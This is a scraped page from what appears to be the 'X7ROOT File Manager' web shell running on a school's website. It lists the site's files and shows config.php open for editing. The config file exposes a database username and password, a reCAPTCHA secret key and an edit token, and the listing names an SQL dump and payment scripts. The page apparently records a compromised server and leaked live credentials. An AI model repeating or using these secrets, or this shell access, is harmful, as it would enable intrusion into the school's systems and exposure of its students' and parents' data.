X7ROOT File Manager
Current Path:
/home/u126090504/domains/saiadarshainternationalschool.org.in/public_html
home
/
u126090504
/
domains
/
saiadarshainternationalschool.org.in
/
public_html
/
📁
..
📄
.htaccess
(0 B)
📄
Antiraging-Cell.php
(2.73 KB)
📄
SVM-INT (1) (1).zip
(117.51 MB)
📄
about-us.php
(5.86 KB)
📄
academic-calendar.php
(2.73 KB)
📄
achievements.php
(9.56 KB)
📄
achievers.php
(15.19 KB)
📁
admin
📄
admission-process.php
(6.85 KB)
📄
admission.php
(12.93 KB)
📄
admission_submit.php
(3.38 KB)
📄
album.php
(890 B)
📄
assessment-policy.php
(6.8 KB)
📄
cbse-curriculum-summary.php
(5.99 KB)
📄
computer-courses.php
(22.83 KB)
📄
config.php
(1.27 KB)
📄
contact-us.php
(14.63 KB)
📄
contactdb.php
(796 B)
📄
courses.php
(10.44 KB)
📁
css
📄
director's-message.php
(6.54 KB)
📄
downloads.php
(2.9 KB)
📄
error.log
(14.6 KB)
📄
facilities.php
(6.04 KB)
📄
faculty.php
(10.27 KB)
📄
fee-structure.php
(7.97 KB)
📁
fonts
📄
footer.php
(23.95 KB)
📄
franchise.php
(2.09 KB)
📄
gallery.php
(3.05 KB)
📄
google929b505e9f42f894.html
(53 B)
📄
grievance-form.php
(16.52 KB)
📄
header.php
(19.69 KB)
📄
homework.php
(9.64 KB)
📁
images
📄
index.php
(39.38 KB)
📄
infrastructure-details.php
(5.39 KB)
📁
js
📁
lib
📄
managing-committee.php
(3.34 KB)
📄
media-corner.php
(2.48 KB)
📄
non-academic-achievers.php
(14.65 KB)
📄
payment.php
(21.85 KB)
📄
payment_submit.php
(15.1 KB)
📄
payment_verify.php
(2.31 KB)
📄
placement.php
(8.33 KB)
📄
principal's-message.php
(6.65 KB)
📄
public-disclosure.php
(3.38 KB)
📁
qrcodes
📁
revolution
📁
sai
📄
scope.php
(14.14 KB)
📄
search_videos.php
(1.76 KB)
📄
sitemap.xml
(4.69 KB)
📄
subjects-offered.php
(6 KB)
📄
submit-grievance.php
(3.88 KB)
📁
svm
📄
thank-you.php
(1.28 KB)
📄
u126090504_svmint.sql
(40.87 KB)
📁
uploads
📄
videos.php
(6.87 KB)
Editing: config.php
<?php // Production: hide display errors ini_set('display_errors', 0); ini_set('display_startup_errors', 0); error_reporting(E_ALL); // ✅ Fill these with EXACT values from hosting panel $server_name = "127.0.0.1"; $db_username = "u126090504_saiads"; $db_password = "8984234299Aa@#"; // <-- your provided password $db_name = "u126090504_saiads"; $db_port = 3306; define('RECAPTCHA_SITE_KEY', '6LeswGMsAAAAAJCk6iklfq4o9o-J-dMb9jpfBhPU'); define('RECAPTCHA_SECRET_KEY', '6LeswGMsAAAAAODhxJBI4Z_JR5v4K4FrfPCp9vlh'); mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); try { $conn = new mysqli($server_name, $db_username, $db_password, $db_name, $db_port); $conn->set_charset("utf8mb4"); } catch (mysqli_sql_exception $e) { error_log("DB Connection failed: ".$e->getMessage()); http_response_code(500); die("Internal server error. Please try again later."); } /* App constants */ if (!defined('BASE_URL')) define('BASE_URL', 'https://saiadarshainternationalschool.org.in/'); if (!defined('MAIL_FROM')) define('MAIL_FROM', 'no-reply@saiadarshainternationalschool.org.in'); if (!defined('MAIL_FROM_NAME')) define('MAIL_FROM_NAME', 'saiadarshainternationalschool'); define('BRANDING_EDIT_TOKEN', 'Eduweb@2025_RedSecure!');
Upload File
Create Folder